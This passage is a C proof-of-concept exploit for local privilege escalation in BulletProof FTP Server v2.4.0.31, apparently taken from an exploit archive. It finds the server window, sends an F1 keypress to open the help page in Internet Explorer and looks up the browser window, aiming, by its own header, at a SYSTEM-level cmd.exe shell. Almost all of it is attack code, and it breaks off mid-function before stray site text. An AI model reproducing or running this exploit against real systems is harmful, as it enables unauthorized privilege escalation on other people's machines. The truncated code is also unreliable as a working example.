BulletProof FTP Server 2.x Local Privilege Escalation Exploit//********************************************************
//Privilege escalation in BulletProof FTP Server v2.4.0.31
//By Jerome Athias
//jerome DOT athias AT free DOT fr
//Discovered by Reed Arvin reedarvin[at]gmail[dot]com
//(http://reedarvin.thearvins.com)
//
//Little PoC
//Gives you a shell with system privileges
//********************************************************
#include "stdio.h"
#include "windows.h"
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
char sText[]="%windir%\\system32\\cmd.exe";
char buffer[256];
lHandle=FindWindow(NULL, "BulletProof FTP Server v2.4.0.31");
if (!lHandle)
{
printf("\nUsage :\nBulletProof FTP Server v2.4.0.31 doesn't seem to run?\n");
return 0;
}
else
{
printf("handle for BulletProof : 0x%X\n",lHandle);
}
SetForegroundWindow(lHandle);
SendMessage(lHandle, WM_IME_KEYDOWN, VK_F1, 0); //send F1 key "help me please!"
Sleep(5000); //I need this time to drink a beer ;P
//Find the browser Handle
//lHandle2=FindWindow(NULL, "BPFTP Server - Mozilla Firefox");
//if (!lHandle2)
//{
lHandle2=FindWindow("IEFrame", "BPFTP Server - Microsoft Internet Explorer");
lHandle2=FindWindowEx(NULL, NULL, "IEFrame", NULL);
printf("handle for IE : 0x%X\n",lHandle2);
if (!lHandle2)
{
printf("\nError while finding the browser's window.\n");
}
/
推荐
评论(0条)
